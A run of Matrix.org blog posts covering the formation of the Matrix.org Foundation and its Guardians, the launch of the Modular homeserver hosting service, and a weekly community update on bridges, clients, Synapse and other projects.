    For the purposes of initially setting up the Foundation, the initial Guardians are Matthew & Amandine - but in the coming weeks we're expecting to appoint at least three independent Guardians in order to ensure that the current team form a minority on the board and ensure the neutrality of the Foundation relative to Matthew & Amandine's day jobs at New Vector.The profile we're looking for in Guardians are: folks who are independent of the commercial Matrix ecosystem (and especially independent from New Vector), and may even not be members of today's Matrix community, but who are deeply aligned with the mission of the project, and who are respected and trusted by the wider community to uphold the guiding principles of the Foundation and keep the other Guardians honest.
  • An immutable asset lock, to protect the intellectual property of the Foundation and prevent it from ever being sold or transferred elsewhere.
  • An immutable mission lock, which defines the Foundation's mission as a non-profit neutral guardian of the Matrix standard, with an initial formal goal of finalising the open governance process.  To quote article 4 from the initial Articles of Association:
    • 4. The objects of the Foundation are for the benefit of the community as a whole to:

      4.1.1  empower users to control their communication data and have freedom over their communications infrastructure by creating, maintaining and promoting Matrix as an openly standardised secure decentralised communication protocol and network, open to all, and available to the public for no charge;

      4.1.2  build and develop an appropriate governance model for Matrix through the Foundation, in order to drive the adoption of Matrix as a single global federation, an open standard unencumbered from any proprietary intellectual property and/or software patents, minimising fragmentation (whilst encouraging experimentation), maximising speed of development, and prioritising the long-term success and growth of the overall network over the commercial concerns of an individual person or persons.
  • You can read the initial Articles of Association here (although all the rest of it is fairly generic legal boilerplate for a non-profit company at this point which hasn't yet been tuned; the Matrix-specific stuff is Article 4 as quoted above).  You can also see the initial details of the Foundation straight from the horse's mouth over at https://beta.companieshouse.gov.uk/company/11648710.
Then, in the next and final phase, what remains is to:
  • Appoint 3+ more Guardians (see above).
  • Finalise MSC1318 and incorporate the appropriate bits into the Articles of Associations (AoA).  (We might literally edit MSC1318 directly into the final AoA, to incorporate as much input as possible from the full community)
  • Tune the boilerplate bits of the AoA to incorporate the conclusions of MSC1318.
  • Register the Foundation as a Community Interest Company, to further anchor the Foundation as being for the benefit of the wider community.
  • Perform an Asset Transfer of any and all Matrix.org property from New Vector to the Foundation (especially the Matrix.org domain and branding, and donations directed to Matrix.org).
So there you have it! It's been a long time in coming, and huge thanks to everyone for their patience and support in getting to this point, but finally The Matrix.org Foundation exists.  Watch this space over the coming weeks as we announce the Guardians and finish bootstrapping the Foundation into its final long-term form!  Meanwhile, any questions: come ask in #matrix-spec-process:matrix.org or in the blog comments here.

thanks,

Matthew, Amandine, and the forthcoming Guardians of [the] Matrix!

Modular: the world’s first Matrix homeserver hosting provider!

22.10.2018 00:00 — In the News Matthew Hodgson

Hi folks,

Today is one of those pivotal days for the Matrix ecosystem: we're incredibly excited to announce that the world's first ever dedicated homeserver hosting service is now fully available over at https://modular.im!  This really is a massive step for Matrix towards being a mature ecosystem, and we look forward to Modular being the first of many hosting providers in the years to come :D

Modular lets anyone spin up a dedicated homeserver and Riot via a super-simple web interface, rather than having to run and admin their own server.  It's built by New Vector (the startup who makes Riot and hires many of the Matrix core team), and comes from taking the various custom homeserver deployments for people like Status and TADHack and turning them into a paid service available to everyone.  You can even point your own DNS at it to get a fully branded dedicated homeserver for your own domain!

Anyway, for full details, check out the announcement over at the Riot blog.  We're particularly excited that Modular helps increase Matrix's decentralisation, and is really forcing us to ensure that the Federation API is getting the attention it deserves.  Hopefully it'll also reduce some load from the Matrix.org homeserver! Modular will also help Matrix by directly funding Matrix development by the folks working at New Vector, which should in turn of course benefit the whole ecosystem.

Many people reading this likely already run their own servers, and obviously they aren't the target audience for Modular.  But for organisations who don't have a sysadmin or don't want to spend the time to run their own server, hopefully Modular gives a very cost-effective way of running your own dedicated reliable Matrix server without having to pay for a sysadmin :)

We're looking forward to see more of these kind of services popping up in the future from everywhere in the ecosystem, and have started a Matrix Hosting page on the Matrix website so that everyone can advertise their own: don't hesitate to get in touch if you have a service to be featured!

If you're interested, please swing by #modular:matrix.org or feel free to shoot questions to [email protected].

This Week In Matrix 2018-09-07

08.09.2018 00:00 — This Week in Matrix Matthew Hodgson

Hi all,

Ben's away today, so this TWIM is brought to you mainly in association with Cadair's TWIMbot!

Spec Activity

Since last week's sprint to get the new spec releases out, focus on the core team has shifted exclusively to the remaining stuff needed to cut the first stable release for the Server-Server API.  In practice this means fleshing out the MSCs in flight and implementing them - work has progressed on both improving auth rules, switching event IDs to be hashes and others.  Whilst implementing this in Synapse we're also doing a complete audit and overhaul of the current federation code, hence the 0.33.3.1 security release this week.

Meanwhile, in the community, ma1uta reports:

I am working on the jeon (java matrix api) to update it to the latest stable release. Also I changed versions of api to form rX.Y.Z-N where rX.Y.Z is a API version and N is a library version within API. So, I have prepared Push API (r0.1.0-1), Identity API (r0.1.0-1) and Appservice API (r0.1.0-1) for the first release and current updating the C2S API to the r0.4.0 version.

XMPP Bridging

Are you in the market for a Matrix-XMPP bridge? When I say "market", I mean it because this week we have two announcements for bridging to XMPP! You can choose whether you'd prefer your bridge to be implemented as a puppet, or a bot.

Ma1uta has a new version of his Matrix-Xmpp bridge:

It is a double-puppet bridge which can connects the Matrix and XMPP ecosystems. Just invite the @_xmpp_master:ru-matrix.org and tell him: @_xmpp_master: connect [email protected] to connect current room with the specified conference.
You can ask about this bridge in the #matrix-jabber-java-bridge:ru-matrix.org room.
Currently supports only conferences and only m.text messages. 1:1 conversations and other message types will be later.

maze appeared this week and announced MxBridge, a new Matrix-XMPP bridge:

It works as a bot, so it is non-puppeting. Rooms can be mapped dynamically by the bot administrator(s). There is no support for 1-1 chats (yet). MxBridge is written as a multi-process application in Elixir and it should scale quite well (but don't tie me down on it ;)). https://github.com/djmaze/mxbridge

Seaglass

Neil powers onwards with Seaglass, with updates this week including:

  • Displaying stickers
  • Lazy-loading room history on startup to help with performance
  • Scrollback support (both forwards and backwards)
  • Support for Matthew's Account (aka retries on initial sync for those of us with massive initial syncs, and general perf improvements to nicely support >2000 rooms)
  • Better avatar support & cosmetics on macOS Mojave
  • Encryption verification support, device blacklisting and message information
  • Ability to turn encryption on in rooms
  • Responding to encryption being turned on in rooms
  • Paranoid mode for encryption (only send to verified devices)
  • Invitation support (both in UI and /invite)

Matrique

Blackhat announces that Matrique's new design is almost done, along with GNU/Linux, MacOS and Windows nightly build!

Fractal

Alexandre Franke says:

Fractal 3.30 got release alongside the rest of GNOME. It includes a bunch of new and updated translations, and redacted messages are now hidden.

Meanwhile, hidden in this screenshot, uhoreg noted that E2E plans are progressing...

Riot

Bruno has been hacking away on Riot/Web squashing the remaining Lazy Loading Members defects and various related optimisations and fixes. We also released Riot/Web 0.16.3 as a fairly minor point release (which unfortunately has a regression with DM avatars, which is fixed in 0.16.4, for which a first RC was cut a few hours ago and should be released on Monday).  Meanwhile the first cut of Lazy Loading also got implemented on Android as well. Both are hidden behind labs flags, but we're almost at a point where we can turn it on now!  Otherwise, the Riot team has got sucked into working on commercial Matrix stuff, for better or worse (all shall be revealed shortly though!)

Construct

Jason has been working heavily on Construct, and has new test users.  Construct is able to federate with Synapse and the rest of the Matrix ecosystem.  mujx has created a docker for Construct which streamlines its deployment.

Construct development is still occurring here https://github.com/jevolk/charybdis but we are now significantly closer to pushing the first release to https://github.com/matrix-construct. Also feel free to stop by in #test:zemos.net / #zemos-test:matrix.org as well -- a room hosted by Construct, of course.

tulir has now deployed using the standalone install instructions on a very small LXC VM using ZFS. Unfortunately ZFS does not support O_DIRECT (direct disk IO) which is how Construct achieves maximum performance using concurrent reads. This is not a problem though when using an SSD or for personal deployments. I'll be posting more about how Construct hacked RocksDB to use direct IO, which can get the most out of your hardware with multiple requests in-flight (even with an SSD).

Synapse

Work was split this week into spec/security work, with the critical update for 0.33.3.1 - if you haven't upgraded, please do so immediately.

Otherwise, Hawkowl has been on a mission to finish the Python 3 port, which is now almost merged.  Testers should probably wait until it fully merges to the develop branch and we'll yell about it then, but impatient adrenaline enthusiasts may want to check out the hawkowl/py3-3 branch (although it may explode in your face, mangle your DB and format your cat, and probably misses lots of recent important PRs like the 0.33.3.1 stuff).  However, i've been running a variant on some servers for the last few days without problems - and it seems (placebo effect notwithstanding) incredibly snappy...

Meanwhile, the Lazy Loaded Member implementation got sped up by 2-3x, which makes /sync roughly 2-3x faster than it would be without Lazy Loading.  This hasn't merged yet, but was the main final blocker behind Lazy Loading going live!

matrix-docker-ansible-deploy

Slavi reports:

matrix-docker-ansible-deploy now supports bridging to Telegram by installing tulir's mautrix-telegram bridge. This feature is contributed by @izissise.

In addition, Matrix Synapse is now more configurable from the playbook, with support for enabling stats-reporting, event cache size configurability, password peppering.

Matrix Python SDK needs a maintainer

We should say a huge Thank You to &Adam for his work leading the Python SDK over the previous months! Unfortunately due to a busy home life (best of luck for the second child!) he has decided to step down as lead maintainer. Anyone interested in this project should head to https://github.com/matrix-org/matrix-python-sdk/issues/279, and also come and chat in #matrix-python-sdk:matrix.org.

MatrixToyBots!

Coffee reports that:

A new bot appears! Are you a pedantic academic who likes to correct others' misuse of Latin-derived plurals? This task can now be automated for you by means of SingularBot! Also for people who just like to have some fun. Free PongBot and SmileBot included.

kitsune on Hokkaido island

I ended up being on Hokkaido island right when a major earthquake struck it; so no activity on Matrix from me in the nearest couple of days. Also, donations to GlobalGiving for the disaster relief are welcome because people are really struggling here (abusing the communication channel, sorry).

Matrix Live

...has got delayed again; sorry - we're rather overloaded atm. We'll catch up as soon as we can.